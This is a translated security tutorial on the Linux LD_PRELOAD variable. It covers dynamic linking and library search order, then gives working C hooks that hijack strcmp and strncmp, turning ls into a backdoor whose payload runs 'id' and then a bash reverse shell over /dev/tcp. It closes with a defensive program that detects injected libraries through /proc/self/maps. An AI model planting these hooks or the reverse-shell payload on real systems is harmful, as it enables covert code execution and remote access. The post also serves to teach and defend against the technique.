In-depth analysis of LD_PRELOAD
2022-07-16 04:33:00 【Ruo_Xiao】
I. Prerequisite knowledge
LD_PRELOAD is an environment variable on Linux/Unix systems that influences the program's runtime linker: it lets you name shared libraries that are loaded before the program starts, ahead of every other library. The feature is mainly used to selectively pick up the same function from a different shared library. Through this variable we can slot a library in between the program and its other libraries, and even override functions in the normal libraries.
1. Program linking
Program linking can be divided into the following three kinds:
- Static linking: before the program runs, each object module and the library functions it needs are linked into one complete executable, which is never taken apart again.
- Load-time dynamic linking: the set of object modules produced by compiling the source program is linked while it is being loaded into memory.
- Run-time dynamic linking: the object modules produced by compiling the source program are linked only when they are first needed during execution.
A static library on Linux has the file suffix .a, for example libstdc++.a; its object code is copied directly into the executable when the program is linked.
A dynamic library on Linux is a .so file. At link time only a reference to the library is recorded, and the real "linking" happens when the program runs, hence the name "dynamic linking". If several programs on the same machine use the same dynamic library, only one copy has to be loaded into memory and shared between them. For this reason a dynamic link library is also called a shared library or shared object.
Linux names shared library files according to the following rule:
libname.so.x.y.z
- lib: uniform prefix.
- .so: uniform suffix.
- name: the library name; for libstdc++.so.6.0.21 the name is stdc++.
- x: major version number. It marks a significant upgrade of the library; libraries with different major version numbers are not compatible. For libstdc++.so.6.0.21 the major version is 6.
- y: minor version number. It marks an incremental upgrade, such as new interfaces; within the same major version, a higher minor version is backward compatible with a lower one. For libstdc++.so.6.0.21 the minor version is 0.
- z: release number. It marks optimizations, bug fixes and the like; libraries with the same major and minor version but different release numbers are fully compatible. For libstdc++.so.6.0.21 the release number is 21.
Search order of the dynamic library search path:
- the dynamic library search path specified when the object code was compiled (several paths may be given, searched in order);
- the dynamic library search path given by the environment variable LD_LIBRARY_PATH (several paths may be given, searched in order);
- the dynamic library search path given in the configuration file /etc/ld.so.conf (several paths may be given, searched in order);
- the default dynamic library search path /lib;
- the default dynamic library search path /usr/lib.
Notice, however, that the environment variable this article is about, LD_PRELOAD, does not appear anywhere in this search order; LD_LIBRARY_PATH does. The relationship and difference between the two have been discussed at length by knowledgeable people on Stack Overflow, with many views, but I agree with the following one:
LD_PRELOAD (not LD_PRELOAD_PATH) is a list of specific libraries (files) to be loaded before any other libraries, whether the program wants them or not. LD_LIBRARY_PATH is a list of directories to search when loading libraries that would have been loaded anyway. On Linux you can read man ld.so for more information about these and other environment variables that affect the dynamic linker.
So LD_PRELOAD sits outside the library search order altogether: it names shared libraries that are loaded first, before the program even runs.
II. Exploitation
As I understand it, LD_PRELOAD is also a form of code injection, although the way the injection works differs from the usual web-side injection.
1. Demo
We rewrite a function that the program calls at run time, compile it into a shared library file, then control the environment variable so that the program loads our malicious library first and executes the malicious function we wrote in it.
The specific steps are as follows:
- Define a function whose name, parameters and parameter types, return value and return type exactly match the function to be replaced. This means consulting the relevant manual before writing the library.
- Compile the C file into a shared library.
- Set LD_PRELOAD to the path of the library file; from then on the target program's original function is hijacked.
- To end the attack, simply run unset LD_PRELOAD.
This technique works against programs written in any language; here we test it with a C demo.
whoami.c

```c
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char name[] = "mon";                    /* the expected name */
    if (argc < 2) {
        printf("usage: %s <given-name>\n", argv[0]);
        return 0;
    }
    /* strcmp() is the libc call the preloaded library will replace */
    if (!strcmp(name, argv[1])) {
        printf("\033[0;32;32mYour name Correct!\n\033[m");
        return 1;
    } else {
        printf("\033[0;32;31mYour name Wrong!\n\033[m");
        return 0;
    }
}
```

Next we write the shared library; the target function chosen here is strcmp:
```c
#include <stdlib.h>
#include <string.h>

/* Replacement for libc's strcmp: reports every pair of strings as equal. */
int strcmp(const char *s1, const char *s2) {
    (void)s1;
    (void)s2;
    if (getenv("LD_PRELOAD") == NULL) {
        return 0;
    }
    /* clear the variable so processes started afterwards do not load this library too */
    unsetenv("LD_PRELOAD");
    return 0;
}
```

Because the function was hijacked through LD_PRELOAD and a new process is started after the hijack, the new process would inherit LD_PRELOAD and we would fall into an endless loop unless the variable is cleared before it starts. So the environment variable LD_PRELOAD has to be removed, and the most direct way is to call unsetenv("LD_PRELOAD").
Whatever name is now entered, the program reports it as correct.
At this point we have hijacked the strcmp function.
2. Making the backdoor
In the operating system, the commands available on the command line are themselves driven by a series of shared libraries; on Linux we can inspect them with the readelf -Ws command. System commands are stored under /usr/bin.
Since they all use shared libraries, suppose we use LD_PRELOAD to replace a library function that a system command calls: can we then make the system command's call into that library execute the malicious code in our LD_PRELOAD library?
This is the principle behind making a backdoor; here we use ls as the example.
We pick a library function that is easy to work with, strncmp@GLIBC_2.2.5.
So our ls will, through a call to system, also run the id command.
hook_strncmp.c

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload(void) {
    system("id");
}

/* the exact prototype can be read from the compiler's error message if it is declared wrongly */
int strncmp(const char *__s1, const char *__s2, size_t __n) {
    (void)__s1;
    (void)__s2;
    (void)__n;
    if (getenv("LD_PRELOAD") == NULL) {
        return 0;
    }
    /* clear the variable before system() forks, or the child would load this library again */
    unsetenv("LD_PRELOAD");
    payload();
    return 0;
}
```

Now that id has been executed, we can instead have the command run here spawn a reverse shell:
```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void payload(void) {
    system("bash -c 'bash -i >& /dev/tcp/127.0.0.1/2333 0>&1'");
}

/* the exact prototype can be read from the compiler's error message if it is declared wrongly */
int strncmp(const char *__s1, const char *__s2, size_t __n) {
    (void)__s1;
    (void)__s2;
    (void)__n;
    if (getenv("LD_PRELOAD") == NULL) {
        return 0;
    }
    /* clear the variable before system() forks, or the child would load this library again */
    unsetenv("LD_PRELOAD");
    payload();
    return 0;
}
```

The reverse shell connects back successfully.
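As a defender-side counterpart to the hooks above, here is an added example (not code from the original post) that audits a process for LD_PRELOAD injection. Because both hooks call unsetenv("LD_PRELOAD"), the variable alone is weak evidence, so the check also reads /proc/self/maps, where the injected object stays mapped; the list of trusted library roots is an assumption of the example.

```c
/* preload_audit.c: added example, not code from the original article. Defender-side check
 * for LD_PRELOAD injection: the variable is weak evidence (a hook can unsetenv() it), so the
 * process's own /proc/self/maps is also scanned for file-backed mappings outside trusted roots. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/* Assumed trusted library roots; adjust for your distribution. Linux only. */
static const char *const TRUSTED[] = {"/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", NULL};
/* 1 if path starts with a trusted root. Hand-rolled prefix test: strncmp itself may be hooked. */
int path_is_trusted(const char *path) {
    for (int i = 0; TRUSTED[i]; i++) {
        const char *s = path, *p = TRUSTED[i];
        while (*p && *s == *p) s++, p++;
        if (!*p) return 1;
    }
    return 0;
}
/* LD_PRELOAD holds colon- or space-separated names (man ld.so); count entries that are
 * relative (resolved through the search path) or not under a trusted root. */
int count_untrusted_preloads(const char *value) {
    char buf[4096]; int n = 0; if (!value) return 0;
    snprintf(buf, sizeof buf, "%s", value);
    for (char *t = strtok(buf, ": "); t; t = strtok(NULL, ": "))
        if (t[0] != '/' || !path_is_trusted(t)) n++;
    return n;
}
/* A maps line is "addr perms offset dev inode [path]". Count lines whose path is a file outside
 * a trusted root and not the executable itself; [vdso], [stack] etc. have no slash and are skipped. */
int audit_maps_text(const char *maps, const char *self_exe) {
    int n = 0;
    for (const char *ln = maps, *nl = NULL; ln && *ln; ln = nl ? nl + 1 : NULL) {
        nl = strchr(ln, '\n');
        const char *path = strchr(ln, '/');
        if (!path || (nl && path > nl) || path_is_trusted(path)) continue;
        size_t plen = nl ? (size_t)(nl - path) : strlen(path);
        if (strlen(self_exe) == plen && memcmp(path, self_exe, plen) == 0) continue;
        fprintf(stderr, "untrusted mapping: %.*s\n", (int)plen, path); n++;
    }
    return n;
}
/* Run both checks against the current process; a non-zero result means findings. */
int audit_self(void) {
    static char maps[1 << 18], exe[4096];
    ssize_t el = readlink("/proc/self/exe", exe, sizeof exe - 1);
    FILE *f = fopen("/proc/self/maps", "r");
    size_t got = f ? fread(maps, 1, sizeof maps - 1, f) : 0; if (f) fclose(f);
    maps[got] = '\0'; exe[el > 0 ? el : 0] = '\0';
    return count_untrusted_preloads(getenv("LD_PRELOAD")) + audit_maps_text(maps, exe);
}
int main(void) { return audit_self() ? 1 : 0; }
```

Running a program with LD_DEBUG=libs (a glibc facility described in man ld.so) prints the search order from the first section together with any preloaded objects as the dynamic linker resolves them; reading /proc/<pid>/maps of the suspect process from another process gives the same mapping check without depending on libc inside the possibly hooked process.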
Reprinted from: Qianxin Attack and Defense Community - In-depth analysis of LD_PRELOAD